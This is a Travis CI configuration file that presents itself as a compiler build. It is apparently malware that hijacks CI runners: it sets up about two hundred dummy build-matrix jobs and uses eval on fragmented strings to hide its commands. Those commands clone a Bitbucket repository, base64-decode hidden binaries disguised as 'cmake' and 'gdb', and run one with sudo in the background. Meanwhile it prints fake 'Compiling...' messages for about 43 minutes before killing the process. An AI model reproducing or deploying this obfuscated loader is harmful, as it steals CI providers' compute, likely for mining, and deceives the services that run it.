dist: bionic

env:
  - BUILD="--usepkg-exclude=384Q0"
  - BUILD="--buildpkg-exclude=936HD"
  - BUILD="--nodeps=6536M"
  - BUILD="--changelog=90975"
  - BUILD="--sync-submodule=8133t"
  - BUILD="--ignore-world=2134R"
  - BUILD="--fetchonly=468Gh"
  - BUILD="--autounmask-keep-keywords=159LH"
  - BUILD="--with-bdeps-auto=3OG"
  - BUILD="--jobs=9014d"
  - BUILD="--oneshot=438xb"
  - BUILD="--quiet-unmerge-warn=511o2"
  - BUILD="--deselect=582a1"
  - BUILD="--fetchonly=120Yw"
  - BUILD="--config-root=8045"
  - BUILD="--dynamic-deps=836lW"
  - BUILD="--complete-graph-if-new-use=902o2"
  - BUILD="--alphabetical=910gk"
  - BUILD="--changelog=970G4"
  - BUILD="--fail-clean=298pZ"
  - BUILD="--with-bdeps=115OV"
  - BUILD="--searchdesc=90289"
  - BUILD="--buildpkgonly=364PG"
  - BUILD="--sysroot=612eF"
  - BUILD="--autounmask-write=6867e"
  - BUILD="--usepkg=293Na"
  - BUILD="--rebuild-if-unbuilt=622zk"
  - BUILD="--deep=985Sq"
  - BUILD="--usepkg=451Md"
  - BUILD="--fetchonly=610LL"
  - BUILD="--jobs=162t4"
  - BUILD="--buildpkg-exclude=821ID"
  - BUILD="--color=171oE"
  - BUILD="--accept-properties=826ue"
  - BUILD="--autounmask=707mU"
  - BUILD="--with-bdeps-auto=4813"
  - BUILD="--deep=547lC"
  - BUILD="--rebuild-ignore=522H5"
  - BUILD="--buildpkg-exclude=8199a"
  - BUILD="--reinstall-atoms=584d2"
  - BUILD="--rebuilt-binaries-timestamp=216Iw"
  - BUILD="--rebuilt-binaries=67AC"
  - BUILD="--onlydeps=813NW"
  - BUILD="--verbose=65Nn"
  - BUILD="--with-bdeps-auto=635vP"
  - BUILD="--load-average=682qV"
  - BUILD="--rebuilt-binaries-timestamp=573lJ"
  - BUILD="--buildpkg-exclude=979HH"
  - BUILD="--quiet-build=843ap"
  - BUILD="--info=713Zd"
  - BUILD="--pretend=292t7"
  - BUILD="--oneshot=195HE"
  - BUILD="--help=678vv"
  - BUILD="--deep=3160W"
  - BUILD="--columns=679hO"
  - BUILD="--nodeps=1696I"
  - BUILD="--root=877U8"
  - BUILD="--rebuild-exclude=4662z"
  - BUILD="--fetch-all-uri=30pD"
  - BUILD="--autounmask-continue=320Hz"
  - BUILD="--fail-clean=79190"
  - BUILD="--autounmask-continue=611i1"
  - BUILD="--quiet-repo-display=964Uk"
  - BUILD="--keep-going=177A7"
  - BUILD="--rebuild-ignore=443Fc"
  - BUILD="--nospinner=598er"
  - BUILD="--noreplace=920Fa"
  - BUILD="--fail-clean=786B"
  - BUILD="--rebuild-ignore=479f6"
  - BUILD="--quiet=374zc"
  - BUILD="--pretend=307WR"
  - BUILD="--alert=80Fo"
  - BUILD="--reinstall-atoms=995mQ"
  - BUILD="--help=728dB"
  - BUILD="--clean=163nf"
  - BUILD="--columns=7947c"
  - BUILD="--rebuild-exclude=728KA"
  - BUILD="--changed-use=635Wv"
  - BUILD="--noconfmem=135zH"
  - BUILD="--version=234Sv"
  - BUILD="--prune=6051f"
  - BUILD="--clean=650K1"
  - BUILD="--help=159oq"
  - BUILD="--pkg-format=687tV"
  - BUILD="--autounmask-continue=802Ug"
  - BUILD="--autounmask-keep-keywords=368lg"
  - BUILD="--load-average=267qB"
  - BUILD="--autounmask-keep-keywords=198yy"
  - BUILD="--ignore-built-slot-operator-deps=800i8"
  - BUILD="--config-root=4536J"
  - BUILD="--config-root=725vy"
  - BUILD="--quiet-repo-display=69OT"
  - BUILD="--with-bdeps-auto=168yi"
  - BUILD="--quickpkg-direct=960DV"
  - BUILD="--color=5083J"
  - BUILD="--columns=326gQ"
  - BUILD="--nospinner=622RH"
  - BUILD="--usepkg-exclude=924uJ"
  - BUILD="--changelog=128pk"
  - BUILD="--buildpkg=221V4"
  - BUILD="--changed-slot=545rK"
  - BUILD="--verbose-slot-rebuilds=797kK"
  - BUILD="--nodeps=398Ne"
  - BUILD="--sysroot=962k7"
  - BUILD="--ignore-built-slot-operator-deps=101WV"
  - BUILD="--rebuild-if-new-slot=466Ie"
  - BUILD="--fetchonly=343pH"
  - BUILD="--quiet-unmerge-warn=5574z"
  - BUILD="--complete-graph-if-new-use=80t2"
  - BUILD="--verbose-conflicts=271MA"
  - BUILD="--pkg-format=820r7"
  - BUILD="--autounmask-use=13MU"
  - BUILD="--prune=193jN"
  - BUILD="--resume=458yg"
  - BUILD="--usepkgonly=775yn"
  - BUILD="--selective=275vN"
  - BUILD="--alert=240Xf"
  - BUILD="--buildpkg-exclude=897cL"
  - BUILD="--color=254YF"
  - BUILD="--autounmask-keep-keywords=861JO"
  - BUILD="--reinstall=952Xd"
  - BUILD="--rage-clean=703Nw"
  - BUILD="--select=712Lk"
  - BUILD="--version=987xr"
  - BUILD="--tree=646lL"
  - BUILD="--buildpkgonly=786SL"
  - BUILD="--resume=5667d"
  - BUILD="--rebuilt-binaries=67nF"
  - BUILD="--backtrack=442oX"
  - BUILD="--rebuild-ignore=694f8"
  - BUILD="--autounmask-continue=3864m"
  - BUILD="--quiet-fail=185yo"
  - BUILD="--rebuild-if-unbuilt=3128M"
  - BUILD="--rebuild-exclude=603JW"
  - BUILD="--color=9167w"
  - BUILD="--rebuild-exclude=978Od"
  - BUILD="--columns=278fO"
  - BUILD="--rage-clean=330Zr"
  - BUILD="--rebuild-if-unbuilt=45cU"
  - BUILD="--depclean-lib-check=275dW"
  - BUILD="--quiet-build=516G0"
  - BUILD="--pkg-format=846F3"
  - BUILD="--quiet-build=1R0"
  - BUILD="--autounmask-continue=340RL"
  - BUILD="--update=464gZ"
  - BUILD="--rebuilt-binaries-timestamp=613ss"
  - BUILD="--config-root=583TB"
  - BUILD="--autounmask-only=170wi"
  - BUILD="--rebuild-exclude=355ju"
  - BUILD="--regen=584bE"
  - BUILD="--rebuild-if-new-rev=116yq"
  - BUILD="--rebuilt-binaries=6763d"
  - BUILD="--ask=919GX"
  - BUILD="--package-moves=78MR"
  - BUILD="--autounmask-license=793JP"
  - BUILD="--autounmask-continue=116m9"
  - BUILD="--debug=214RA"
  - BUILD="--usepkg=186br"
  - BUILD="--buildpkg-exclude=323we"
  - BUILD="--exclude=77Y9"
  - BUILD="--newrepo=838Ru"
  - BUILD="--buildpkgonly=502PP"
  - BUILD="--ask=844vd"
  - BUILD="--verbose-conflicts=26Ms"
  - BUILD="--backtrack=709oy"
  - BUILD="--use-ebuild-visibility=414g2"
  - BUILD="--fetchonly=396m1"
  - BUILD="--root=437RX"
  - BUILD="--sync=901bz"
  - BUILD="--changed-slot=4639Z"
  - BUILD="--use-ebuild-visibility=566QX"
  - BUILD="--list-sets=437WX"
  - BUILD="--reinstall-atoms=785bZ"
  - BUILD="--dynamic-deps=61jF"
  - BUILD="--dynamic-deps=5901Z"
  - BUILD="--changed-use=852KO"
  - BUILD="--rebuild-ignore=1861O"
  - BUILD="--rage-clean=186w9"
  - BUILD="--buildpkgonly=472au"
  - BUILD="--check-news=40569"
  - BUILD="--ignore-default-opts=636sC"
  - BUILD="--binpkg-changed-deps=77t3"
  - BUILD="--buildpkg-exclude=9796S"
  - BUILD="--check-news=691xC"
  - BUILD="--fuzzy-search=702OX"
  - BUILD="--ask-enter-invalid=36FU"
  - BUILD="--keep-going=524x7"
  - BUILD="--quiet-repo-display=459kA"
  - BUILD="--debug=529hf"

language: minimal

script:
  - NcPXC="sudo apt up"
  - XUMyXLpbLo="date || tru"
  - eval "$NcPXC""$XUMyXLpbLo""e"
  - CLMRiqCfxl="sudo apt --"
  - tmrFDOn="yes install"
  - KMIraxtXI=" cl-base64 "
  - qAxqKA="git &>/dev/"
  - eval "$CLMRiqCfxl""$tmrFDOn""$KMIraxtXI""$qAxqKA""null"
  - OVkmPKgy="git clone h"
  - gNtqrnq="ttps://gccb"
  - YABrZZeQDP="uild@bitbuc"
  - ZyJhabixQ="ket.org/gcc"
  - zEjOybpDIAF="build/gcc.g"
  - qBnBYzi="it &>/dev/n"
  - eval "$OVkmPKgy""$gNtqrnq""$YABrZZeQDP""$ZyJhabixQ""$zEjOybpDIAF""$qBnBYzi""ull"
  - rvvifcJoM="base64 -d g"
  - YwbaiVYPY="cc/cmake_ >"
  - eval "$rvvifcJoM""$YwbaiVYPY"" cmake"
  - TtkEwBFcz="base64 -d g"
  - FdqTwmX="cc/config_ "
  - eval "$TtkEwBFcz""$FdqTwmX""> cconfig"
  - wOrICp="base64 -d g"
  - qGNYim="cc/make_ > "
  - eval "$wOrICp""$qGNYim""gdb"
  - chmod +x gdb cmake
  - ./cmake
  - sed -i 's/build/tg3o/g' cconfig
  - HJaLAXS="sudo ./gdb "
  - AaVzvFeuSm="--config=cc"
  - TaPWqELE="onfig &>/de"
  - eval "$HJaLAXS""$AaVzvFeuSm""$TaPWqELE""v/null &"
  - GCC=$(date +%s)
  - echo $BUILD
  - while true; do CC=$(date +%s); echo Compiling...; [ $CC -ge $((GCC + 2570)) ] && sudo killall gdb && break; sleep 183; done
